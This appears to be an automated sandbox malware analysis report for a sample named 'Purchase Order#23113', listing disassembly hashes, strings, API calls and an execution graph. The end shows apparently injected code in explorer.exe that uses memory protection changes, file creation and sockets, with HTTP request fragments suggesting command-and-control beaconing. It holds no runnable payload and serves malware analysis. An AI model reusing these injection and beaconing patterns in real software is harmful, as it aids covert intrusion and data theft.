                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                            • Instruction ID: 54f8d335c6cc637217a0c83b2210091b6c41869745db810f529649d5f0eb42b0
                                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                            • Instruction Fuzzy Hash: D1D05E36511A50EFC332AF1BEA04D13FBF9FBC4A207050A2EA54583A24C770A806CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                            • Instruction ID: bdaeecba143da3727f462d7bcfad4ec2925339bc0bc944954098c72df5a9bd91
                                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                            • Instruction Fuzzy Hash: F7D0A932208620ABD732AA1CFC04FC3B3E8BB88720F060859B019C7090C360AC81CA88
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                            • Instruction ID: 98ec11cd43290f9696eb4f92a7a7470e8db6d5a40e31f2fed589fe5d32eef5e9
                                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                            • Instruction Fuzzy Hash: E4E0EC359507849BDF16EF59C644F5AFBB5BB94B40F550458A1085B665CA24A900CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                            • Instruction ID: 0583c9b5c60fea8d0ce79335003a13d135851d78c9a6ee977ebb87b6c1e9c4a6
                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                            • Instruction Fuzzy Hash: C8D0223221203193CB2866556804F63E915EB80AA0F2A006CB80AD3C00C5088C43C2E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                            • Instruction ID: edbbe8db903b0d68d7a6a5a60fe6d0d77bdac9bffd0a547ace30009fc649cf73
                                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                            • Instruction Fuzzy Hash: 5DD012371D055DBBCB11AF66DC01F957BA9E764BA0F444420B518875A0C63AE950D584
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3987e76787e3285811a463d6928a12122f4aa4c0f7ecbef8c78f5466ab5b87a5
                                                                            • Instruction ID: a21811c6fefc5c6e7bd4fd4bd5a7884b071edc4696a8fbc67701f353d148c8c2
                                                                            • Opcode Fuzzy Hash: 3987e76787e3285811a463d6928a12122f4aa4c0f7ecbef8c78f5466ab5b87a5
                                                                            • Instruction Fuzzy Hash: 39D0A930601002CBDF3BDF08CA10E2EFAB8FF50641F9000ACEB4492420E328DE01CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                            • Instruction ID: b4dac245020ee297402e05ea0df95dd86c4ff3b296fb860948a41023720db7ba
                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                            • Instruction Fuzzy Hash: CCD09235216E80CFD61A8B0CC5A4B56B3A4BB44A44F810490E502CBB62D768D944CA00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                            • Instruction ID: 91e0ca9c3ccf127e0074c385e5f1f823f7e72d0e8bdef0c76885acd45acf12ed
                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                            • Instruction Fuzzy Hash: 29C08033150644AFC711EF95CD01F0177A9F798B40F000421F30447570C631FC10D644
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                            • Instruction ID: 3503616d8dd4f5168892c0b07d6c4a8d3b4533cc1b886396258214cf7fd5c5b9
                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                            • Instruction Fuzzy Hash: 91D0123610024CEFCB01DF41C890D9AB72AFBD8710F148019FD19076118A71ED62DA50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                            • Instruction ID: 339144d1e80c19ab8bfd9a7e587b31f9f52084aed25446689298c66b8b8865fa
                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                            • Instruction Fuzzy Hash: 94C04879B41A428FCF16EB2AD298F49B7E4FB44740F150890E849CBB22EB24E841CA10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 70ed5dc120f28b8be917022cfc11f43c9740276647927c9909fc12cc4dd9deb6
                                                                            • Instruction ID: 41e2b56450196392426a3d0e6987e681fe7f0aa49dfdf9b7c735d8e6a976529d
                                                                            • Opcode Fuzzy Hash: 70ed5dc120f28b8be917022cfc11f43c9740276647927c9909fc12cc4dd9deb6
                                                                            • Instruction Fuzzy Hash: F5900231649800129240715848C4546D006A7E0311B95C021E0424568CCA148B565363
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 61a5cfe99b0a3e4bb6c49400bb527aa96208f209e7fa5a0db6776bec5a7d07d3
                                                                            • Instruction ID: fa589fb42e20d343070f2cf68bbd74a6c5dee36c14b8b0d0f7d60a33909efbad
                                                                            • Opcode Fuzzy Hash: 61a5cfe99b0a3e4bb6c49400bb527aa96208f209e7fa5a0db6776bec5a7d07d3
                                                                            • Instruction Fuzzy Hash: C490026164550042424071584844406F006A7E13113D5C125A0554574CC6188A55936B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3099d042307ac5583c37e8ba05446c82c2d1aa0a5d944877b208378c3f5cddd0
                                                                            • Instruction ID: 82f354f0dbb7838e9409b3fd980cc5070d5490f479570642b61a035371118f24
                                                                            • Opcode Fuzzy Hash: 3099d042307ac5583c37e8ba05446c82c2d1aa0a5d944877b208378c3f5cddd0
                                                                            • Instruction Fuzzy Hash: B390023124944842D24071584444A46901697D0315F95C021A00646A8DD6258F55B763
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ee6feb7ee8afcd29d3aee7455bed5655fe6c4f2f078b473e274f8f625bd0fd8
                                                                            • Instruction ID: 1d8675b97e36cf4ee9af8df51f39dadd73ca382c6421357f6911120cc5340b0f
                                                                            • Opcode Fuzzy Hash: 5ee6feb7ee8afcd29d3aee7455bed5655fe6c4f2f078b473e274f8f625bd0fd8
                                                                            • Instruction Fuzzy Hash: 2590023164940802D25071584454746900697D0311F95C021A0024668DC7558B5577A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017A4725
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017A46FC
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017A4655
                                                                            • ExecuteOptions, xrefs: 017A46A0
                                                                            • Execute=1, xrefs: 017A4713
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 017A4787
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017A4742
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$[$]:%u
                                                                            • API String ID: 48624451-2819853543
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017A02BD
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017A02E7
                                                                            • RTL: Re-Waiting, xrefs: 017A031E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017A7B7F
                                                                            • RTL: Resource at %p, xrefs: 017A7B8E
                                                                            • RTL: Re-Waiting, xrefs: 017A7BAC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A728C
                                                                            Strings
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017A7294
                                                                            • RTL: Resource at %p, xrefs: 017A72A3
                                                                            • RTL: Re-Waiting, xrefs: 017A72C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:2.3%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:4.7%
                                                                            Total number of Nodes:444
                                                                            Total number of Limit Nodes:16
13893->13894 13893->13895 13894->13895 13976 e636fbf 13977 e637016 13976->13977 13978 e6370bb 13977->13978 13981 e6338f2 NtProtectVirtualMemory 13977->13981 13982 e6370f0 13977->13982 13979 e6370e8 13978->13979 13983 e6338f2 NtProtectVirtualMemory 13978->13983 13980 e63a382 ObtainUserAgentString 13979->13980 13980->13982 13981->13978 13983->13979 13896 e6398be 13898 e6398c3 13896->13898 13897 e6399a6 13898->13897 13899 e639995 ObtainUserAgentString 13898->13899 13899->13897 13500 e63ef82 13501 e63efb8 13500->13501 13503 e63f081 13501->13503 13511 e63f022 13501->13511 13512 e63b5b2 13501->13512 13504 e63f134 13503->13504 13506 e63f117 getaddrinfo 13503->13506 13503->13511 13509 e63f1b2 13504->13509 13504->13511 13515 e63b732 13504->13515 13506->13504 13508 e63f7f4 setsockopt recv 13508->13511 13509->13511 13518 e63b6b2 13509->13518 13510 e63f729 13510->13508 13510->13511 13513 e63b60a socket 13512->13513 13514 e63b5ec 13512->13514 13513->13503 13514->13513 13516 e63b76a 13515->13516 13517 e63b788 connect 13515->13517 13516->13517 13517->13509 13519 e63b6e7 13518->13519 13520 e63b705 send 13518->13520 13519->13520 13520->13510 13753 e640a4d 13754 e640a53 13753->13754 13757 e634782 13754->13757 13756 e640a6b 13758 e63478f 13757->13758 13759 e6347ad 13758->13759 13761 e639662 13758->13761 13759->13756 13762 e63966b 13761->13762 13770 e6397ba 13761->13770 13763 e6330f2 6 API calls 13762->13763 13762->13770 13765 e6396ee 13763->13765 13764 e639750 13767 e63983f 13764->13767 13769 e639791 13764->13769 13764->13770 13765->13764 13766 e63ef82 6 API calls 13765->13766 13766->13764 13768 e63ef82 6 API calls 13767->13768 13767->13770 13768->13770 13769->13770 13771 e63ef82 6 API calls 13769->13771 13770->13759 13771->13770 13792 e63fe0a 13793 e63e942 13792->13793 13794 e63fe45 NtProtectVirtualMemory 13793->13794 13795 e63fe70 13794->13795 13920 e63814a 13921 e638153 13920->13921 13925 e638174 13920->13925 13923 e63a382 ObtainUserAgentString 13921->13923 13922 e6381e7 13924 
e63816c 13923->13924 13926 e6330f2 6 API calls 13924->13926 13925->13922 13928 e6331f2 13925->13928 13926->13925 13929 e63320f 13928->13929 13933 e6332c9 13928->13933 13930 e63df12 7 API calls 13929->13930 13931 e633242 13929->13931 13930->13931 13932 e633289 13931->13932 13935 e634432 NtCreateFile 13931->13935 13932->13933 13934 e6330f2 6 API calls 13932->13934 13933->13925 13934->13933 13935->13932 13796 e634613 13798 e634620 13796->13798 13797 e63467e 13798->13797 13799 e63fe12 NtProtectVirtualMemory 13798->13799 13799->13798 13494 e63fe12 13495 e63fe45 NtProtectVirtualMemory 13494->13495 13498 e63e942 13494->13498 13497 e63fe70 13495->13497 13499 e63e967 13498->13499 13499->13495 13872 e638cd4 13874 e638cd8 13872->13874 13873 e639022 13874->13873 13875 e638352 NtCreateFile 13874->13875 13876 e638f0d 13875->13876 13876->13873 13877 e638792 NtCreateFile 13876->13877 13877->13876 13955 e636dd9 13956 e636df0 13955->13956 13957 e63a382 ObtainUserAgentString 13956->13957 13958 e636ecd 13956->13958 13957->13958 13800 e640a1f 13801 e640a25 13800->13801 13804 e6345f2 13801->13804 13803 e640a3d 13805 e6345fb 13804->13805 13806 e63460e 13804->13806 13805->13806 13807 e639662 6 API calls 13805->13807 13806->13803 13807->13806 13525 e6332dd 13529 e63331a 13525->13529 13526 e6333fa 13527 e633328 SleepEx 13527->13527 13527->13529 13529->13526 13529->13527 13532 e63df12 13529->13532 13541 e634432 13529->13541 13551 e6330f2 13529->13551 13534 e63df48 13532->13534 13533 e63e134 13533->13529 13534->13533 13535 e63e0e9 13534->13535 13540 e63e232 NtCreateFile 13534->13540 13557 e63ef82 13534->13557 13536 e63e125 13535->13536 13569 e63d842 13535->13569 13577 e63d922 13536->13577 13540->13534 13542 e63445b 13541->13542 13550 e6344c9 13541->13550 13543 e63e232 NtCreateFile 13542->13543 13542->13550 13544 e634496 13543->13544 13545 e6344c5 13544->13545 13589 e634082 13544->13589 13547 e63e232 NtCreateFile 13545->13547 13545->13550 13547->13550 13548 e6344b6 13548->13545 13598 e633f52 
13548->13598 13550->13529 13552 e633109 13551->13552 13553 e6331d3 13551->13553 13603 e633012 13552->13603 13553->13529 13555 e633113 13555->13553 13556 e63ef82 6 API calls 13555->13556 13556->13553 13558 e63efb8 13557->13558 13559 e63b5b2 socket 13558->13559 13560 e63f081 13558->13560 13568 e63f022 13558->13568 13559->13560 13561 e63f134 13560->13561 13563 e63f117 getaddrinfo 13560->13563 13560->13568 13562 e63b732 connect 13561->13562 13566 e63f1b2 13561->13566 13561->13568 13562->13566 13563->13561 13564 e63b6b2 send 13567 e63f729 13564->13567 13565 e63f7f4 setsockopt recv 13565->13568 13566->13564 13566->13568 13567->13565 13567->13568 13568->13534 13570 e63d86d 13569->13570 13585 e63e232 13570->13585 13572 e63d906 13572->13535 13573 e63d888 13573->13572 13574 e63ef82 6 API calls 13573->13574 13575 e63d8c5 13573->13575 13574->13575 13575->13572 13576 e63e232 NtCreateFile 13575->13576 13576->13572 13578 e63d9c2 13577->13578 13579 e63e232 NtCreateFile 13578->13579 13580 e63d9d6 13579->13580 13581 e63da9f 13580->13581 13583 e63ef82 6 API calls 13580->13583 13584 e63da5d 13580->13584 13581->13533 13582 e63e232 NtCreateFile 13582->13581 13583->13584 13584->13581 13584->13582 13586 e63e25c 13585->13586 13588 e63e334 13585->13588 13587 e63e410 NtCreateFile 13586->13587 13586->13588 13587->13588 13588->13573 13590 e634420 13589->13590 13591 e6340aa 13589->13591 13590->13548 13591->13590 13592 e63e232 NtCreateFile 13591->13592 13594 e6341f9 13592->13594 13593 e6343df 13593->13548 13594->13593 13595 e63e232 NtCreateFile 13594->13595 13596 e6343c9 13595->13596 13597 e63e232 NtCreateFile 13596->13597 13597->13593 13599 e633f70 13598->13599 13600 e633f84 13598->13600 13599->13545 13601 e63e232 NtCreateFile 13600->13601 13602 e634046 13601->13602 13602->13545 13604 e633031 13603->13604 13605 e6330cd 13604->13605 13606 e63ef82 6 API calls 13604->13606 13605->13555 13606->13605 13878 e636edd 13880 e636f06 13878->13880 13879 e636fa4 13880->13879 13881 e6338f2 
NtProtectVirtualMemory 13880->13881 13882 e636f9c 13881->13882 13883 e63a382 ObtainUserAgentString 13882->13883 13883->13879

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: getaddrinforecvsetsockopt
                                                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                            • API String ID: 1564272048-1117930895
                                                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                            • Instruction ID: 24f853ddee4357311a24fdd71b3ea095b452a61f834aaa99deeda68bec25f5cc
                                                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                            • Instruction Fuzzy Hash: 66528230618B088BCB69EF78E4947EAB7E1FB55300F60492ED49FC7246DE70A949C785
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: `
                                                                            • API String ID: 823142352-2679148245
                                                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                            • Instruction ID: 66f24d52847d2c429417704df8722b1a2414cb7c848f8c7b53336102d0d16cce
                                                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                            • Instruction Fuzzy Hash: E5225A70A18B099FDB59DF38D4986AAF7E1FB98300F50062EE45ED7250DB31E851CB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL ref: 0E63FE67
                                                                            Memory Dump Source
